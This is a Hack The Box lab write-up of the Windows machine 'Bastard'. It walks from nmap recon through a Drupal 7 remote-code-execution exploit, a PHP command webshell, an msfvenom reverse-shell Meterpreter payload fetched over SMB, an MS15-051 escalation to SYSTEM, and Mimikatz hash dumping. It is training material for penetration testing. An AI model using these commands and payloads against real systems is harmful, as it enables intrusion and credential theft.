HTB - Bastard Writeup - 10.10.10.9
Bastard is a medium rated Windows Server 2008 R2 machine on hackthebox.eu.
Summary
Bastard is not overly challenging; however, it requires some knowledge of PHP in order to modify and use the proof of concept needed for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems.
Recon and Scanning
Nmap Results
Nmap 7.80 scan initiated Fri May 1 10:06:33 2020 as: nmap -sC -sV -oA nmap/bastard 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.052s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
From the ports shown here I can see that this is a Windows box running IIS 7.5. IIS 7.5 ships with Windows Server 2008 R2 (and Windows 7), so we are most likely dealing with a Windows Server 2008 R2 box.
Drupal Exploit
The fact that Drupal 7 is also listed brings to mind the Exploit DB proof of concept for Drupal 7.x CMS applications that allows unauthenticated remote code execution. For the script to work we need to know the REST endpoint and the IP of the server. To find the REST endpoint I will use GoBuster with the dirbuster directory-list-2.3-medium.txt wordlist.
Directory Busting to find the REST endpoint
gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Bingo, we now have the URL of the REST endpoint, /rest. Now we can download the exploit script and fill in the necessary parameters.
Getting a Shell as iusr
First we need to install the php-curl package (the PHP cURL extension the script depends on), which can be done with:
sudo apt install php-curl
Next, we need to modify the script from Exploit DB to include the REST endpoint, the IP of Bastard, the name of the PHP webshell to be placed and the contents of that PHP file; below are the values that I used.
Specifically, I changed the contents of the webshell to be:
<?php echo system($_GET["cmd"]); ?>
This gives us a simpler shell to work with. Note that PHP's system() already prints the command output and only returns its last line, so the echo repeats that line once more in the response; a plain <?php system($_GET["cmd"]); ?> would do the same job without the duplicate.
Running the Exploit
Now that we have modified our PHP script, we can run it with the following command:
php Drupal-Exploit.php
Now if we visit the given URL and append ?cmd=whoami, we can see that we have a shell as nt authority\iusr.
Priv Esc to Administrator
Generating a Meterpreter Payload
To start things off, I will generate an executable Meterpreter payload so that we get a Meterpreter session instead of this PHP webshell.
The command to generate a .exe payload is:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.23 LPORT=4567 -f exe > msf.exe
- Replacing LHOST with your HTB IP
- Replacing LPORT with a port of your choosing
Setting Up Metasploit
To get a Meterpreter session we first need to upload our msf.exe file to the server. For this I will use Impacket's smbserver.py to spin up an SMB share in our current working directory, then use the Windows copy command to get the file onto the machine.
To start an SMB server simply run:
smbserver.py evilshare /root/htb/boxes/Bastard/
Now that the SMB server is running we can enter copy \\10.10.14.23\evilshare\msf.exe msf.exe into our PHP webshell.
We can then open the Metasploit console and use exploit/multi/handler to receive the callback from our payload.
Next, set the payload to the same one used with msfvenom, windows/x64/meterpreter/reverse_tcp:
- Set LHOST to your HTB IP
- Set LPORT to the port used with msfvenom
- Type exploit to start the listener
Popping a Meterpreter Shell
Now that the listener is running, we can go back to our webshell and simply run msf.exe through it, i.e. append ?cmd=msf.exe to the webshell URL.
Bingo! We got a Meterpreter shell!
IUSR to SYSTEM
Windows Exploit Suggester
As this is an older version of Windows Server, we first load post/multi/recon/local_exploit_suggester to get a list of possible privilege escalations:
use post/multi/recon/local_exploit_suggester
set SESSION <meterpreter session ID>
run
Unluckily, the exploit we need is not in this list. I found it by trial and error: as the system is an unpatched Server 2008 R2 install, it is vulnerable to MS15-051.
MS15-051 Metasploit Module
Luckily for us, Metasploit has a module for MS15-051, exploit/windows/local/ms15_051_client_copy_image
The parameters we need to set are:
- LHOST, our HTB IP
- LPORT, a local port of your choosing
- SESSION, our Meterpreter session number
- TARGET, 1 as we are attacking 64 bit Windows
A Meterpreter Session as SYSTEM
Now that the options are set we can type exploit and wait for the reverse connection.
Nice, we now have a shell as SYSTEM.
User and Root Flags
We can also now get the root and user flags.
type \users\dimitris\desktop\user.txt
type \users\administrator\desktop\root.txt.txt
Beyond Root
Now that we have rooted the machine we can load the Mimikatz Meterpreter extension and dump the SAM hashes. (In current Metasploit releases this extension has been replaced by kiwi: load kiwi, then lsa_dump_sam.)
load mimikatz
mimikatz_command -f samdump::hashes
If you enjoyed the write-up or found it useful, consider +repping my HTB profile linked below: